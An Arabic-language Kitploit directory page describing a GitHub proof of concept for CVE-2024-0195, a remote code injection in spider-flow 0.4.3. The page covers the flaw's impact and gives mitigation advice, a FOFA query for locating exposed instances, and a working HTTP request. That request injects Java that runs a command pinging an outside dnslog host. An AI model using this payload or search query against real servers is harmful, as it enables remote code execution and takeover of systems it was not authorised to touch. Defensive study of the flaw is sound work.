Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-0195-SpiderFlow — CVE-2024-0195 التحكم غير السليم في توليد الشيفرة ('حقن الشيفرة') | Kitploit
أدوات/GitHubGitHub/gh-ost00/cve-2024-0195-spiderflow
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubgh-ost00/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

CVE-2024-0195 التحكم غير السليم في توليد الشيفرة ('حقن الشيفرة')

عرض المستودع
53منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-0195 التحكم غير الملائم في توليد الكود ('حقن الكود')

ملخص

ثغرة CVE-2024-0195 هي ثغرة حرجة من نوع حقن الكود (Code Injection) في تطبيق الويب spider-flow الإصدار 0.4.3، وتحديدًا في الدالة FunctionService.saveFunction الموجودة في الملف FunctionController.java. يمكن للمهاجم إدخال كود خبيث عن بُعد يتم تنفيذه على الخادم. وهذا يسمح بالاختراق الكامل للتطبيق.

التأثير

هذه الثغرة خطيرة للغاية لأنها تسمح بتنفيذ الكود عن بُعد على الخادم الذي يستضيف تطبيق spider-flow المعرض للخطر. يمكن للمهاجم اختراق الخادم بالكامل، وسرقة البيانات الحساسة، وتثبيت برامج ضارة أو برامج تعدين العملات الرقمية، واستخدامه في هجمات أخرى داخل الشبكة. تتأثر سرية وسلامة وتوفر التطبيق والخادم بشكل بالغ.

التصحيح

لم يتم ذكر إصدار مصحح بشكل صريح، لذا لا يبدو أن التصحيح خيار حاليًا. تم الكشف عن الثغرة علنًا وتتوفر أكواد الاستغلال، لذا فإن التخفيف الفوري أمر بالغ الأهمية.

التخفيف

حتى يتم إصدار تصحيح رسمي، يجب إخراج spider-flow 0.4.3 من الخدمة فورًا أو تقييد الوصول إلى الشبكات/المستخدمين الموثوقين فقط. يمكن تكوين جدران حماية تطبيقات الويب أو ضوابط التحقق من الإدخال الأخرى لاكتشاف ومنع محاولات هجمات حقن الكود كإجراء تخفيف مؤقت. ومع ذلك، هذه ليست حلولًا كاملة ويجب ترقية الإصدار المعرض للخطر بمجرد توفر إصدار مصحح.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

الاستغلال

FOFA : app="spiderflow"

✔ إثبات المفهوم

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
تنزيل الأداة